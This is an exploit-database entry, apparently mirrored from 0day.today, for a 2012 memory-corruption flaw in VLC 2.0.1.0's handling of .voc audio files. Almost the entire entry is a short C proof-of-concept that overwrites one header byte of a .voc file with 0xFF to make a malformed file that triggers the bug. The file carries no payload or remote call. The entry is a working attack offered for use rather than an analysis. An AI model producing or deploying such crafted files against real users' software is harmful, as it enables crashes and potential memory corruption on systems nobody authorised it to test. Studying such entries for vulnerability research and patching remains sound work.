VLC v. 2.0.1.0 .voc Memory Corruption

2012-03-19T00:00:00
ID 1337DAY-ID-17769
Type zdt
Reporter Dan Fosco
Modified 2012-03-19T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            # Exploit Title: VLC v. 2.0.1.0 .voc Memory Corruption
# Date: 3/18/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)

#include <stdio.h>

int main(int argc, char *argv[])
{
	FILE *f;
	f = fopen(argv[1], "r+");

	fseek(f, 20, SEEK_SET);
	fputc('\xff', f);

	fclose(f);
	return 0;
}

/code updates .voc file, can find samples on videolan ftp server



#  0day.today [2018-01-05]  #